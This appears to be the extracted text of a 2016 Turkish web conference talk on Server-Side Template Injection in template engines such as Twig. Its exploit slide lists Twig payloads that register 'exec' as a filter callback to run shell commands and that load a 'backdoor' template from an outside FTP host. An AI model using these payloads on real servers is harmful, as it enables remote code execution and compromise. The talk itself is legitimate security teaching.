Web Çatı Şablonlarının Güvenliği (SSTI) Ömer Çıtak Özgür Web Teknolojileri Günleri 2016 - www.ozgurwebgunleri.org.tr www.omercitak.com
Web Çatı Şablonlarının Güvenliği (SSTI)
Ömer Çıtak
Özgür Web Teknolojileri Günleri 2016 - www.ozgurwebgunleri.org.tr
www.omercitak.com
whoamiSecurity Researcher @ Netsparker Ltd.
Developer @ Geri kalan zamanlarda
Writer @ Ethical Hacking “Offensive & Defensive” Book
Blog: omercitak.com
All Social Platform: @Om3rCitak
quesitions1. Asp.net or PHP?
quesitions1. Asp.net or PHP?
2. Asp or Laravel?
quesitions1. Asp.net or PHP?
2. Asp or Laravel?
3. Laravel or Smarty?
quesitions1. Asp.net or PHP?
2. Asp or Laravel?
3. Laravel or Smarty?
4. Smarty or Asp?
quesitions1. Asp.net or PHP?
2. Asp or Laravel?
3. Laravel or Smarty?
4. Smarty or Asp?
why using framework?
why using framework?● Spaghetti Code (functions.php) :P
why using framework?● Spaghetti Code (functions.php) :P
● Enforcing Coding Standart
why using framework?● Spaghetti Code (functions.php) :P
● Enforcing Coding Standart
● Pretty URLs
why using framework?● Spaghetti Code (functions.php) :P
● Enforcing Coding Standart
● Pretty URLs
● Much of the code in less time
why using framework?● Spaghetti Code (functions.php) :P
● Enforcing Coding Standart
● Pretty URLs
● Much of the code in less time
● MVC or other models
why using framework?
what is the MVC?
what is the MVC?
what is the MVC?
what is the VIEW layer?
what is the VIEW layer?Template Engines;
● Twig● Smarty● Blade● Volt● Mustache● etc...
twig● registerUndefinedFilterCallback(“function_name”)
● getFilter(“filter”)
● setCache(“ftp://omercitak.com:21”)
● loadTemplate(“backdoor”)
exploit● {{_self.env.registerUndefinedFilterCallback(“exec”)}}
● {{_self.env.getFilter(“ls”)}}
● {{_self.env.setCache(“ftp://omercitak.com:21”)}}
● {{_self.env.loadTemplate(“backdoor”)}}
demo
questions
thanks
www.omercitak.com
All Social Platform: @Om3rCitak